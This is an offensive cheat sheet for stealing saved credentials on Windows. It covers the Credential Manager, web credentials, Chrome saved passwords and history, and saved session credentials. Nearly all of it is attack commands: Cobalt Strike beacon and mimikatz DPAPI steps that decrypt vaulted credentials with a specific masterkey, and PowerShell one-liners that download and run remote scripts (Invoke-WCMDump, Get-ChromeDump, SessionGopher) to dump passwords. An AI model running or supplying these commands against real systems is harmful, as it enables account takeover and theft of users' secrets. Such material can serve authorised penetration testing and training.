DPAPI
Credential Manager
# Location
beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials
# OR
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
# OR
beacon> mimikatz vault::list
# Dump The Encrypted Data (pbData, guidMasterKey)
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\9D54C839752B38B233E5D56FDD7891A7
# Get Master Key (Key)
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-3263068140-2042698922-2891547269-1120\a23a1631-e2ca-4805-9f2f-fe8966fd8698 /rpc
# Decrypting
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\9D54C839752B38B233E5D56FDD7891A7 /masterkey:0c0105785f89063857239915037fbbf0ee049d984a09a7ae34f7cfc31ae4e6fd029e6036cde245329c635a6839884542ec97bf640242889f61d80b7851aba8df Windows Credentials Manager
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1')
Invoke-WCMDumpWeb Credentials Manager
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-WebCredentials.ps1')
Get-WebCredentialsGoogle Chrome
# Location
beacon> ls C:\Users\bfarmer\AppData\Local\Google\Chrome\User Data\Default
# Extract
# https://github.com/djhohnstein/SharpChromium
beacon> execute-assembly C:\Tools\SharpChromium\bin\Debug\SharpChromium.exe logins Chrome Passwords
https://github.com/ohyicong/decrypt-chrome-passwords/raw/main/decrypt_chrome_password.exeChrome History
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ChromeDump.ps1')
Get-ChromeDump > chromepwds.txtOther Saved Credentials
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1')
Invoke-SessionGopher -ThoroughLast updated